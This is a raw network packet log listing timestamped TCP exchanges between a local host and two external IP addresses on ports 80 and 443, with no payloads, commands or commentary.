Sep 4, 2024 17:37:08.317744017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317750931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317760944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317770004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317771912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317780972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317781925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317792892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317804098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317806005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317814112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317816019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317826986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.317837000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317857027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.317877054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318206072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318217993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318250895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318350077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318361998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318370104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318377972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318387032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318396091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318397045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318408966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318417072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318427086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318428993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318435907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318447113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318451881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318458080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318468094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318471909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318479061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318490028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318494081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318497896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318500996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318517923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318526030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318527937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318537951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318542957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318552971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318561077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318563938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318571091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318579912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318588972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318593979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318595886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318604946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318614006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318617105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318625927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318634987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318643093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318645954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318649054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318656921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318666935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318669081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318675995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.318691969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.318705082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319083929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319124937 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319303036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319314003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319322109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319331884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319345951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319355011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319355011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319365978 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319366932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319379091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319386005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319387913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319399118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319405079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319408894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319420099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319422960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319437027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319442034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319451094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319459915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319459915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319469929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319477081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319480896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319493055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319494009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319504976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319514990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319515944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319525003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319525957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319535017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319545031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319550991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319555044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319566011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319570065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319576025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319586039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319582939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319597960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319597960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319608927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319618940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.319628000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319628000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.319655895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320158958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320169926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320178032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320188046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320197105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320205927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320209026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320209026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320219040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320228100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320230961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320239067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320249081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320250988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320259094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.320270061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320281029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.320300102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.389921904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.389941931 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.389995098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.390007019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.390043974 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.390412092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.390427113 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.390475988 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.390482903 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.390520096 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.391196012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.391211987 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.391256094 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.391262054 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.391299009 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.392112017 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392136097 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392170906 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.392178059 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392196894 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.392208099 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.392575026 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392587900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392638922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.392647028 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.392680883 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.393191099 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393205881 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393254042 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.393261909 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393297911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.393779993 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393794060 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393841982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.393848896 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.393883944 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.394220114 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.394237995 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.394278049 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.394284964 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.394294977 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.394315958 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.394325972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394341946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394355059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394364119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394368887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.394373894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394380093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.394385099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394392967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.394397020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.394414902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.394433022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396336079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396344900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396394968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396437883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396447897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396456957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396469116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396478891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396506071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396574020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396585941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396595001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396605015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396617889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396617889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396620035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396646976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396653891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396713972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396723986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396733999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396744013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396754980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396774054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396826029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396841049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396868944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396884918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396934986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396945000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396954060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396965027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396972895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396981001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.396985054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.396995068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397005081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397011042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397011995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397033930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397051096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397169113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397182941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397192001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397212029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397233009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397298098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397309065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397317886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397326946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397336960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397340059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397347927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397357941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397362947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397377014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397396088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397423983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397465944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397480965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397494078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397522926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397607088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397619009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397628069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397640944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397650003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397650957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397655010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397684097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397722960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397737980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397747040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397757053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397763014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397778034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397800922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397839069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397852898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397861958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397871971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397885084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397903919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.397953987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397964954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.397996902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398004055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398041010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398150921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398163080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398171902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398181915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398191929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398199081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398202896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398214102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398214102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398224115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398231983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398250103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398267984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398304939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398344994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398381948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398392916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398401976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398422956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398442030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398530960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398541927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398550987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398561001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398571968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398575068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398596048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398605108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398679972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398690939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398699999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398710966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398720026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398720980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398732901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398741961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398744106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398755074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398755074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398766994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398777962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398783922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398797035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398819923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.398986101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.398997068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399005890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399015903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399027109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399029970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399038076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399040937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399048090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399059057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399061918 CEST	49717	80	192.168.2.6	147.45.44.104
